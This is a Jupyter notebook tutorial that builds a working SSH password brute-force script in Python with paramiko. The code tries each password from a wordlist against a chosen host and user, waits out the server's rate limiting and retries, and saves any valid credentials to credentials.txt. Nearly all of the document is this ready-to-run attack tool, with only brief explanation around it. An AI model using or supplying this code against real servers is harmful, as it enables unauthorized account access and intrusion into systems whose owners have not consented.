## **Brute Force**
Brute Force Algorithms are exactly what they sound like – straightforward methods of solving a problem that rely on sheer computing power and trying every possibility rather than advanced techniques to improve efficiency. ... Since you can't remember any of the digits, you have to use a brute force method to open the lock.

In [1]:
!pip3 install paramiko 

In [2]:
!pip3 install colorama

In [3]:
import paramiko
import socket
import time
from colorama import init, Fore

In [5]:
# initialize colorama
init()

GREEN = Fore.GREEN
RED   = Fore.RED
RESET = Fore.RESET
BLUE  = Fore.BLUE

#### **Now let's build a function that given hostname, username, and password, it tells us whether the combination is correct:**

In [6]:
def is_ssh_open(hostname, username, password):
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to know hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        # sleep for a minute
        time.sleep(60)
        return is_ssh_open(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
        return True

#### **Finally, we try to connect to the SSH server and authenticate to it using client.connect() method with 3 seconds of a timeout, this method raises:**

1. `socket.timeout`: when the host is unreachable during the 3 seconds.
2. `paramiko.AuthenticationException`: when the username and password combination is incorrect.
3. `paramiko.SSHException`: when a lot of logging attempts were performed in a short period of time, in other words, the server detects it is some kind of brute-force, we will know that and sleep for a minute and recursively call the function again with the same parameters.

In [9]:
import argparse
parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
parser.add_argument("-u", "--user", help="Host username.")

# parse passed arguments
args = parser.parse_args()
host = args.host
passlist = args.passlist
user = args.user
# read the file
passlist = open(passlist).read().splitlines()
# brute-force
for password in passlist:
    if is_ssh_open(host, user, password):
        # if combo is valid, save it to a file
        open("credentials.txt", "w").write(f"{user}@{host}:{password}")
        break